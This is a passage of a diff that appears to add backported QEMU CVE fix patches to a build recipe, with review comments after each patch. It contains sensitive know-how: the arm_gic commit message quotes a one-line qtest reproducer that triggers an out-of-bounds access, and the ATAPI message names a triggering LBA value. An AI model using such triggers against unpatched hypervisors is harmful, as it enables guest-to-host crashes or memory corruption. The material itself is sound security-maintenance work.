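+ hw/usb/hcd-ohci.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 9dc59101f9..8b912e95d3 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -691,6 +691,10 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ the next ISO TD of the same ED */
+ trace_usb_ohci_iso_td_relative_frame_number_big(relative_frame_number,
+ frame_count);
++ if (OHCI_CC_DATAOVERRUN == OHCI_BM(iso_td.flags, TD_CC)) {
++ /* avoid infinite loop */
++ return 1;
++ }
+ OHCI_SET_BM(iso_td.flags, TD_CC, OHCI_CC_DATAOVERRUN);
+ ed->head &= ~OHCI_DPTR_MASK;
+ ed->head |= (iso_td.next & OHCI_DPTR_MASK);
+--
+2.25.1
+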
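Review bot: The comment `/* avoid infinite loop */` on the new early return in `ohci_service_iso_td` does not say what loops or why the completion code identifies it. Going by the commit message, a TD whose `TD_CC` already holds `OHCI_CC_DATAOVERRUN` is taken to be one this path retired before, meaning the TD list links back on itself; I would write that down, e.g. `/* TD already retired with DATAOVERRUN: the TD list loops, stop here */`. The comparison is also written constant-first, unlike the other visible code; `OHCI_BM(iso_td.flags, TD_CC) == OHCI_CC_DATAOVERRUN` reads more naturally. The function starts and ends outside the hunk.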
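diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
new file mode 100644
index 0000000000..7bfc2beecb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
@@ -0,0 +1,49 @@
+From 7564bf7701f00214cdc8a678a9f7df765244def1 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Wed, 21 Oct 2020 11:35:50 +0530
+Subject: [PATCH] net: remove an assert call in eth_get_gso_type
+
+eth_get_gso_type() routine returns segmentation offload type based on
+L3 protocol type. It calls g_assert_not_reached if L3 protocol is
+unknown, making the following return statement unreachable. Remove the
+g_assert call, it maybe triggered by a guest user.
+
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upsteram-Status: Backport
+CVE: CVE-2020-27617
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ net/eth.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/net/eth.c b/net/eth.c
+index 0c1d413ee2..1e0821c5f8 100644
+--- a/net/eth.c
++++ b/net/eth.c
+@@ -16,6 +16,7 @@
+ */
+
+ #include "qemu/osdep.h"
++#include "qemu/log.h"
+ #include "net/eth.h"
+ #include "net/checksum.h"
+ #include "net/tap.h"
+@@ -71,9 +72,8 @@ eth_get_gso_type(uint16_t l3_proto, uint8_t *l3_hdr, uint8_t l4proto)
+ return VIRTIO_NET_HDR_GSO_TCPV6 | ecn_state;
+ }
+ }
+-
+- /* Unsupported offload */
+- g_assert_not_reached();
++ qemu_log_mask(LOG_UNIMP, "%s: probably not GSO frame, "
++ "unknown L3 protocol: 0x%04"PRIx16"\n", __func__, l3_proto);
+
+ return VIRTIO_NET_HDR_GSO_NONE | ecn_state;
+ }
+--
+2.25.1
+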
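Review bot: The patch header spells its status tag `Upsteram-Status: Backport`, so any tooling that looks for `Upstream-Status` will presumably treat this patch as carrying no status at all. It should read `Upstream-Status: Backport [<upstream commit URL>]`, with the reference filled in the way the CVE-2020-15469 patches in this same change do. In the code itself, the new `qemu_log_mask(LOG_UNIMP, ...)` call replaces the only comment on that path; a one-line comment such as `/* Unknown L3 protocol is guest-controlled input: log, do not assert */` would record why the abort was removed.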
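diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
new file mode 100644
index 0000000000..e26bc31bbb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
@@ -0,0 +1,73 @@
+From 15222d4636d742f3395fd211fad0cd7e36d9f43e Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 16 Aug 2022 10:07:01 +0530
+Subject: [PATCH] CVE-2020-27821
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=4bfb024bc76973d40a359476dc0291f46e435442]
+CVE: CVE-2020-27821
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+memory: clamp cached translation in case it points to an MMIO region
+
+In using the address_space_translate_internal API, address_space_cache_init
+forgot one piece of advice that can be found in the code for
+address_space_translate_internal:
+
+ /* MMIO registers can be expected to perform full-width accesses based only
+ * on their address, without considering adjacent registers that could
+ * decode to completely different MemoryRegions. When such registers
+ * exist (e.g. I/O ports 0xcf8 and 0xcf9 on most PC chipsets), MMIO
+ * regions overlap wildly. For this reason we cannot clamp the accesses
+ * here.
+ *
+ * If the length is small (as is the case for address_space_ldl/stl),
+ * everything works fine. If the incoming length is large, however,
+ * the caller really has to do the clamping through memory_access_size.
+ */
+
+address_space_cache_init is exactly one such case where "the incoming length
+is large", therefore we need to clamp the resulting length---not to
+memory_access_size though, since we are not doing an access yet, but to
+the size of the resulting section. This ensures that subsequent accesses
+to the cached MemoryRegionSection will be in range.
+
+With this patch, the enclosed testcase notices that the used ring does
+not fit into the MSI-X table and prints a "qemu-system-x86_64: Cannot map used"
+error.
+
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+---
+ exec.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/exec.c b/exec.c
+index 2d6add46..1360051a 100644
+--- a/exec.c
++++ b/exec.c
+@@ -3632,6 +3632,7 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
+ AddressSpaceDispatch *d;
+ hwaddr l;
+ MemoryRegion *mr;
++ Int128 diff;
+
+ assert(len > 0);
+
+@@ -3640,6 +3641,15 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
+ d = flatview_to_dispatch(cache->fv);
+ cache->mrs = *address_space_translate_internal(d, addr, &cache->xlat, &l, true);
+
++ /*
++ * cache->xlat is now relative to cache->mrs.mr, not to the section itself.
++ * Take that into account to compute how many bytes are there between
++ * cache->xlat and the end of the section.
++ */
++ diff = int128_sub(cache->mrs.size,
++ int128_make64(cache->xlat - cache->mrs.offset_within_region));
++ l = int128_get64(int128_min(diff, int128_make64(l)));
++
+ mr = cache->mrs.mr;
+ memory_region_ref(mr);
+ if (memory_access_is_direct(mr, is_write)) {
+--
+2.25.1
+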
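Review bot: The subtraction `cache->xlat - cache->mrs.offset_within_region` is done in 64-bit arithmetic before it is widened with `int128_make64`, so the clamp relies on `xlat` never being below `offset_within_region`; if it were, the value would wrap and `diff` would be wrong. The added comment explains what is computed but not that invariant, which presumably comes from `address_space_translate_internal` (not visible here). I would extend the comment with a line such as `xlat >= mrs.offset_within_region holds after the translation above`, or state it with an `assert`. The patch header also replaces the upstream subject with `[PATCH] CVE-2020-27821` and the `From:` line names the backporter, leaving the original title only in the body.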
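diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
new file mode 100644
index 0000000000..756b1c1495
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
@@ -0,0 +1,48 @@
+From c2cb511634012344e3d0fe49a037a33b12d8a98a Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Wed, 11 Nov 2020 18:36:36 +0530
+Subject: [PATCH] hw/net/e1000e: advance desc_offset in case of null descriptor
+
+While receiving packets via e1000e_write_packet_to_guest() routine,
+'desc_offset' is advanced only when RX descriptor is processed. And
+RX descriptor is not processed if it has NULL buffer address.
+This may lead to an infinite loop condition. Increament 'desc_offset'
+to process next descriptor in the ring to avoid infinite loop.
+
+Reported-by: Cheol-woo Myung <330cjfdn@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-28916
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/net/e1000e_core.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/hw/net/e1000e_core.c b/hw/net/e1000e_core.c
+index d8b9e4b2f4..095c01ebc6 100644
+--- a/hw/net/e1000e_core.c
++++ b/hw/net/e1000e_core.c
+@@ -1596,13 +1596,13 @@ e1000e_write_packet_to_guest(E1000ECore *core, struct NetRxPkt *pkt,
+ (const char *) &fcs_pad, e1000x_fcs_len(core->mac));
+ }
+ }
+- desc_offset += desc_size;
+- if (desc_offset >= total_size) {
+- is_last = true;
+- }
+ } else { /* as per intel docs; skip descriptors with null buf addr */
+ trace_e1000e_rx_null_descriptor();
+ }
++ desc_offset += desc_size;
++ if (desc_offset >= total_size) {
++ is_last = true;
++ }
+
+ e1000e_write_rx_descr(core, desc, is_last ? core->rx_pkt : NULL,
+ rss_info, do_ps ? ps_hdr_len : 0, &bastate.written);
+--
+2.25.1
+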
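Review bot: With the increment moved below the `else`, a descriptor with a null buffer address still advances `desc_offset` by `desc_size` even though that branch copies nothing into guest memory, so that slice of the packet appears to be dropped rather than carried over to the next descriptor. `desc_size` is computed earlier in `e1000e_write_packet_to_guest`, outside the hunk, so this should be confirmed there. If dropping the data is the accepted price for guaranteed forward progress, the comment on the `else` branch should say so, e.g. `/* null buffer: nothing is written, but desc_size is still consumed so the loop terminates */`.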
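--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
@@ -0,0 +1,45 @@
+From 813212288970c39b1800f63e83ac6e96588095c6 Mon Sep 17 00:00:00 2001
+From: Paolo Bonzini <pbonzini@redhat.com>
+Date: Tue, 1 Dec 2020 13:09:26 +0100
+Subject: [PATCH] ide: atapi: assert that the buffer pointer is in range
+
+A case was reported where s->io_buffer_index can be out of range.
+The report skimped on the details but it seems to be triggered
+by s->lba == -1 on the READ/READ CD paths (e.g. by sending an
+ATAPI command with LBA = 0xFFFFFFFF). For now paper over it
+with assertions. The first one ensures that there is no overflow
+when incrementing s->io_buffer_index, the second checks for the
+buffer overrun.
+
+Note that the buffer overrun is only a read, so I am not sure
+if the assertion failure is actually less harmful than the overrun.
+
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+Message-id: 20201201120926.56559-1-pbonzini@redhat.com
+Reviewed-by: Kevin Wolf <kwolf@redhat.com>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-29443
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/ide/atapi.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c
+index 14a2b0bb2f..e79157863f 100644
+--- a/hw/ide/atapi.c
++++ b/hw/ide/atapi.c
+@@ -276,6 +276,8 @@ void ide_atapi_cmd_reply_end(IDEState *s)
+ s->packet_transfer_size -= size;
+ s->elementary_transfer_size -= size;
+ s->io_buffer_index += size;
++ assert(size <= s->io_buffer_total_len);
++ assert(s->io_buffer_index <= s->io_buffer_total_len);
+
+ /* Some adapters process PIO data right away. In that case, we need
+ * to avoid mutual recursion between ide_transfer_start
+--
+2.25.1
+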
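Review bot: The two added assertions in ide_atapi_cmd_reply_end() sit after `s->io_buffer_index += size;`, so an out-of-range value is only noticed once the index has already been advanced, and a guest that reaches this path gets a QEMU abort rather than a rejected command; the patch description itself calls this papering over. The header's `Upstream-Status: Backport` carries no upstream commit reference; repeating the hash from the `From` line there would let a later audit check whether upstream's proper handling of the `s->lba == -1` case still needs to be picked up for this recipe. The function body starts and ends outside the hunk.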
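--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
@@ -0,0 +1,51 @@
+Backport of:
+
+From 0db895361b8a82e1114372ff9f4857abea605701 Mon Sep 17 00:00:00 2001
+From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Date: Wed, 7 Apr 2021 20:57:50 +0100
+Subject: [PATCH] esp: always check current_req is not NULL before use in DMA
+ callbacks
+
+After issuing a SCSI command the SCSI layer can call the SCSIBusInfo .cancel
+callback which resets both current_req and current_dev to NULL. If any data
+is left in the transfer buffer (async_len != 0) then the next TI (Transfer
+Information) command will attempt to reference the NULL pointer causing a
+segfault.
+
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
+Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20210407195801.685-2-mark.cave-ayland@ilande.co.uk>
+
+CVE: CVE-2020-35504
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35504.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/0db895361b8a82e1114372ff9f4857abea605701 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/esp.c | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+
+--- a/hw/scsi/esp.c
++++ b/hw/scsi/esp.c
+@@ -362,6 +362,11 @@ static void do_dma_pdma_cb(ESPState *s)
+ do_cmd(s, s->cmdbuf);
+ return;
+ }
++
++ if (!s->current_req) {
++ return;
++ }
++
+ s->dma_left -= len;
+ s->async_buf += len;
+ s->async_len -= len;
+@@ -415,6 +420,9 @@ static void esp_do_dma(ESPState *s)
+ do_cmd(s, s->cmdbuf);
+ return;
+ }
++ if (!s->current_req) {
++ return;
++ }
+ if (s->async_len == 0) {
+ /* Defer until data is available. */
+ return;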
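Review bot: Both new `if (!s->current_req) { return; }` guards return silently, and nothing in do_dma_pdma_cb() or esp_do_dma() says why current_req can be NULL at that point. A one-line comment above each guard, e.g. `/* SCSIBusInfo .cancel may have reset current_req and current_dev to NULL */`, would keep the reason next to the code instead of only in the patch header. The embedded diffstat reports 14 insertions and 5 deletions while the two hunks add 8 lines and remove none, which suggests the header was copied from the upstream commit unchanged; a short note on what the backport dropped would help a later CVE audit. Both function bodies start and end outside the hunks, so whether the early return leaves `dma_left` and `async_len` consistent for the next TI command has to be checked against the full source.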
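--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
@@ -0,0 +1,45 @@
+Backport of:
+
+From 99545751734035b76bd372c4e7215bb337428d89 Mon Sep 17 00:00:00 2001
+From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Date: Wed, 7 Apr 2021 20:57:55 +0100
+Subject: [PATCH] esp: ensure cmdfifo is not empty and current_dev is non-NULL
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+When about to execute a SCSI command, ensure that cmdfifo is not empty and
+current_dev is non-NULL. This can happen if the guest tries to execute a TI
+(Transfer Information) command without issuing one of the select commands
+first.
+
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
+Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20210407195801.685-7-mark.cave-ayland@ilande.co.uk>
+
+CVE: CVE-2020-35505
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35505.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/99545751734035b76bd372c4e7215bb337428d89 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Emily Vekariya <emily.vekariya@einfochips.com>
+---
+ hw/scsi/esp.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/scsi/esp.c b/hw/scsi/esp.c
+index c7d701bf..c2a67bc8 100644
+--- a/hw/scsi/esp.c
++++ b/hw/scsi/esp.c
+@@ -193,6 +193,10 @@ static void do_busid_cmd(ESPState *s, uint8_t *buf, uint8_t busid)
+
+ trace_esp_do_busid_cmd(busid);
+ lun = busid & 7;
++
++ if (!s->current_dev) {
++ return;
++ }
+ current_lun = scsi_device_find(&s->bus, 0, s->current_dev->id, lun);
+ s->current_req = scsi_req_new(current_lun, 0, lun, buf, s);
+ datalen = scsi_req_enqueue(s->current_req);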
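Review bot: The hunk in do_busid_cmd() adds only the `if (!s->current_dev) { return; }` check, while the patch subject and description still promise that cmdfifo is checked for emptiness as well. Presumably the cmdfifo half was dropped because this tree's do_busid_cmd() takes a plain `uint8_t *buf`, but the header should say so, for example with a line such as `[backport: no cmdfifo in this version, only the current_dev check applies]` next to `Upstream-Status`, so that a CVE audit does not assume the full upstream fix is present. The function continues outside the hunk.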
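--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
@@ -0,0 +1,81 @@
+From c2d2d14e8deece958bbc4fc649d22c3564bc4e7e Mon Sep 17 00:00:00 2001
+From: Greg Kurz <groug@kaod.org>
+Date: Thu, 14 Jan 2021 17:04:12 +0100
+Subject: [PATCH] 9pfs: Fully restart unreclaim loop (CVE-2021-20181)
+
+Depending on the client activity, the server can be asked to open a huge
+number of file descriptors and eventually hit RLIMIT_NOFILE. This is
+currently mitigated using a reclaim logic : the server closes the file
+descriptors of idle fids, based on the assumption that it will be able
+to re-open them later. This assumption doesn't hold of course if the
+client requests the file to be unlinked. In this case, we loop on the
+entire fid list and mark all related fids as unreclaimable (the reclaim
+logic will just ignore them) and, of course, we open or re-open their
+file descriptors if needed since we're about to unlink the file.
+
+This is the purpose of v9fs_mark_fids_unreclaim(). Since the actual
+opening of a file can cause the coroutine to yield, another client
+request could possibly add a new fid that we may want to mark as
+non-reclaimable as well. The loop is thus restarted if the re-open
+request was actually transmitted to the backend. This is achieved
+by keeping a reference on the first fid (head) before traversing
+the list.
+
+This is wrong in several ways:
+- a potential clunk request from the client could tear the first
+ fid down and cause the reference to be stale. This leads to a
+ use-after-free error that can be detected with ASAN, using a
+ custom 9p client
+- fids are added at the head of the list : restarting from the
+ previous head will always miss fids added by a some other
+ potential request
+
+All these problems could be avoided if fids were being added at the
+end of the list. This can be achieved with a QSIMPLEQ, but this is
+probably too much change for a bug fix. For now let's keep it
+simple and just restart the loop from the current head.
+
+Fixes: CVE-2021-20181
+Buglink: https://bugs.launchpad.net/qemu/+bug/1911666
+Reported-by: Zero Day Initiative <zdi-disclosures@trendmicro.com>
+Reviewed-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Reviewed-by: Stefano Stabellini <sstabellini@kernel.org>
+Message-Id: <161064025265.1838153.15185571283519390907.stgit@bahia.lan>
+Signed-off-by: Greg Kurz <groug@kaod.org>
+
+Upstream-Status: Backport [89fbea8737e8f7b954745a1ffc4238d377055305]
+CVE: CVE-2021-20181
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/9pfs/9p.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
+index 94df440fc..6026b51a1 100644
+--- a/hw/9pfs/9p.c
++++ b/hw/9pfs/9p.c
+@@ -502,9 +502,9 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
+ {
+ int err;
+ V9fsState *s = pdu->s;
+- V9fsFidState *fidp, head_fid;
++ V9fsFidState *fidp;
+
+- head_fid.next = s->fid_list;
++again:
+ for (fidp = s->fid_list; fidp; fidp = fidp->next) {
+ if (fidp->path.size != path->size) {
+ continue;
+@@ -524,7 +524,7 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
+ * switched to the worker thread
+ */
+ if (err == 0) {
+- fidp = &head_fid;
++ goto again;
+ }
+ }
+ }
+--
+2.29.2
+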
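Review bot: The `goto again` in v9fs_mark_fids_unreclaim() restarts the scan from `s->fid_list` every time the reopen step returns 0, and nothing in the visible lines bounds the number of restarts. Termination depends on that step returning non-zero for a fid that was already reopened on an earlier pass; the call is outside both hunks, so this should be confirmed against the full function rather than assumed. A comment at the label, e.g. `/* restart from the current head: the list may have changed while the coroutine yielded */`, would record why the loop is re-entered. The description also says a clunk request can tear a fid down during the yield, so it is worth confirming that `fidp` is not touched between the yield and the `goto`.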
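--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
@@ -0,0 +1,62 @@
+From 94608c59045791dfd35102bc59b792e96f2cfa30 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Tue, 29 Nov 2022 15:57:13 +0530
+Subject: [PATCH] CVE-2021-20196
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/1ab95af033a419e7a64e2d58e67dd96b20af5233]
+CVE: CVE-2021-20196
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+hw/block/fdc: Kludge missing floppy drive to fix CVE-2021-20196
+
+Guest might select another drive on the bus by setting the
+DRIVE_SEL bit of the DIGITAL OUTPUT REGISTER (DOR).
+The current controller model doesn't expect a BlockBackend
+to be NULL. A simple way to fix CVE-2021-20196 is to create
+an empty BlockBackend when it is missing. All further
+accesses will be safely handled, and the controller state
+machines keep behaving correctly.
+---
+ hw/block/fdc.c | 19 ++++++++++++++++++-
+ 1 file changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/hw/block/fdc.c b/hw/block/fdc.c
+index ac5d31e8..e128e975 100644
+--- a/hw/block/fdc.c
++++ b/hw/block/fdc.c
+@@ -58,6 +58,11 @@
+ } \
+ } while (0)
+
++/* Anonymous BlockBackend for empty drive */
++static BlockBackend *blk_create_empty_drive(void)
++{
++ return blk_new(qemu_get_aio_context(), 0, BLK_PERM_ALL);
++}
+
+ /********************************************************/
+ /* qdev floppy bus */
+@@ -1356,7 +1361,19 @@ static FDrive *get_drv(FDCtrl *fdctrl, int unit)
+
+ static FDrive *get_cur_drv(FDCtrl *fdctrl)
+ {
+- return get_drv(fdctrl, fdctrl->cur_drv);
++ FDrive *cur_drv = get_drv(fdctrl, fdctrl->cur_drv);
++
++ if (!cur_drv->blk) {
++ /*
++ * Kludge: empty drive line selected. Create an anonymous
++ * BlockBackend to avoid NULL deref with various BlockBackend
++ * API calls within this model (CVE-2021-20196).
++ * Due to the controller QOM model limitations, we don't
++ * attach the created to the controller device.
++ */
++ cur_drv->blk = blk_create_empty_drive();
++ }
++ return cur_drv;
+ }
+
+ /* Status A register : 0x00 (read-only) */
+--
+2.25.1
+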
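Review bot: get_cur_drv() now allocates a BlockBackend as a side effect of what used to be a plain accessor, and the new comment says the backend is not attached to the controller device, so no visible code releases it when the device goes away. The comment should state the ownership explicitly: either who unrefs `cur_drv->blk`, or that it is intentionally kept for the lifetime of the process. The function also dereferences `cur_drv->blk` without checking the result of get_drv(); get_drv()'s body is outside the hunk, so confirm it cannot return NULL for any `fdctrl->cur_drv` value the guest can select.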
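--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
@@ -0,0 +1,74 @@
+From: Prasad J Pandit <pjp@fedoraproject.org>
+
+While activating device in vmxnet3_acticate_device(), it does not
+validate guest supplied configuration values against predefined
+minimum - maximum limits. This may lead to integer overflow or
+OOB access issues. Add checks to avoid it.
+
+Fixes: CVE-2021-20203
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913873
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+
+Upstream-Status: Acepted [https://lists.gnu.org/archive/html/qemu-devel/2021-01/msg07935.html]
+CVE: CVE-2021-20203
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ hw/net/vmxnet3.c | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/hw/net/vmxnet3.c b/hw/net/vmxnet3.c
+index eff299f629..4a910ca971 100644
+--- a/hw/net/vmxnet3.c
++++ b/hw/net/vmxnet3.c
+@@ -1420,6 +1420,7 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ vmxnet3_setup_rx_filtering(s);
+ /* Cache fields from shared memory */
+ s->mtu = VMXNET3_READ_DRV_SHARED32(d, s->drv_shmem, devRead.misc.mtu);
++ assert(VMXNET3_MIN_MTU <= s->mtu && s->mtu < VMXNET3_MAX_MTU);
+ VMW_CFPRN("MTU is %u", s->mtu);
+
+ s->max_rx_frags =
+@@ -1473,6 +1474,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* Read rings memory locations for TX queues */
+ pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.txRingBasePA);
+ size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.txRingSize);
++ if (size > VMXNET3_TX_RING_MAX_SIZE) {
++ size = VMXNET3_TX_RING_MAX_SIZE;
++ }
+
+ vmxnet3_ring_init(d, &s->txq_descr[i].tx_ring, pa, size,
+ sizeof(struct Vmxnet3_TxDesc), false);
+@@ -1483,6 +1487,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* TXC ring */
+ pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.compRingBasePA);
+ size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.compRingSize);
++ if (size > VMXNET3_TC_RING_MAX_SIZE) {
++ size = VMXNET3_TC_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->txq_descr[i].comp_ring, pa, size,
+ sizeof(struct Vmxnet3_TxCompDesc), true);
+ VMXNET3_RING_DUMP(VMW_CFPRN, "TXC", i, &s->txq_descr[i].comp_ring);
+@@ -1524,6 +1531,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* RX rings */
+ pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.rxRingBasePA[j]);
+ size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.rxRingSize[j]);
++ if (size > VMXNET3_RX_RING_MAX_SIZE) {
++ size = VMXNET3_RX_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->rxq_descr[i].rx_ring[j], pa, size,
+ sizeof(struct Vmxnet3_RxDesc), false);
+ VMW_CFPRN("RX queue %d:%d: Base: %" PRIx64 ", Size: %d",
+@@ -1533,6 +1543,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* RXC ring */
+ pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.compRingBasePA);
+ size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.compRingSize);
++ if (size > VMXNET3_RC_RING_MAX_SIZE) {
++ size = VMXNET3_RC_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->rxq_descr[i].comp_ring, pa, size,
+ sizeof(struct Vmxnet3_RxCompDesc), true);
+ VMW_CFPRN("RXC queue %d: Base: %" PRIx64 ", Size: %d", i, pa, size);
+--
+2.29.2
+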
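Review bot: The MTU check in vmxnet3_activate_device() uses `assert()` on a value read from guest shared memory, so an out-of-range MTU terminates QEMU instead of being rejected or clamped inside the device model; the upper bound is also strict (`s->mtu < VMXNET3_MAX_MTU`), which excludes the maximum itself. A checked path such as `if (s->mtu < VMXNET3_MIN_MTU || s->mtu > VMXNET3_MAX_MTU) { return; }` with a guest-error log, or clamping as the ring-size hunks do, would keep the failure inside the emulated device. The four ring-size clamps bound only the upper end, so a size of 0 still reaches vmxnet3_ring_init(). The header tag `Upstream-Status: Acepted [...]` is misspelled and points at a mailing-list post rather than a commit, so this patch should be re-checked against what was finally merged upstream.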
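--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
@@ -0,0 +1,67 @@
+From edfe2eb4360cde4ed5d95bda7777edcb3510f76a Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Sun, 31 Jan 2021 11:34:01 +0100
+Subject: [PATCH] hw/intc/arm_gic: Fix interrupt ID in GICD_SGIR register
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Per the ARM Generic Interrupt Controller Architecture specification
+(document "ARM IHI 0048B.b (ID072613)"), the SGIINTID field is 4 bit,
+not 10:
+
+ - 4.3 Distributor register descriptions
+ - 4.3.15 Software Generated Interrupt Register, GICD_SG
+
+ - Table 4-21 GICD_SGIR bit assignments
+
+ The Interrupt ID of the SGI to forward to the specified CPU
+ interfaces. The value of this field is the Interrupt ID, in
+ the range 0-15, for example a value of 0b0011 specifies
+ Interrupt ID 3.
+
+Correct the irq mask to fix an undefined behavior (which eventually
+lead to a heap-buffer-overflow, see [Buglink]):
+
+ $ echo 'writel 0x8000f00 0xff4affb0' | qemu-system-aarch64 -M virt,accel=qtest -qtest stdio
+ [I 1612088147.116987] OPENED
+ [R +0.278293] writel 0x8000f00 0xff4affb0
+ ../hw/intc/arm_gic.c:1498:13: runtime error: index 944 out of bounds for type 'uint8_t [16][8]'
+ SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../hw/intc/arm_gic.c:1498:13
+
+This fixes a security issue when running with KVM on Arm with
+kernel-irqchip=off. (The default is kernel-irqchip=on, which is
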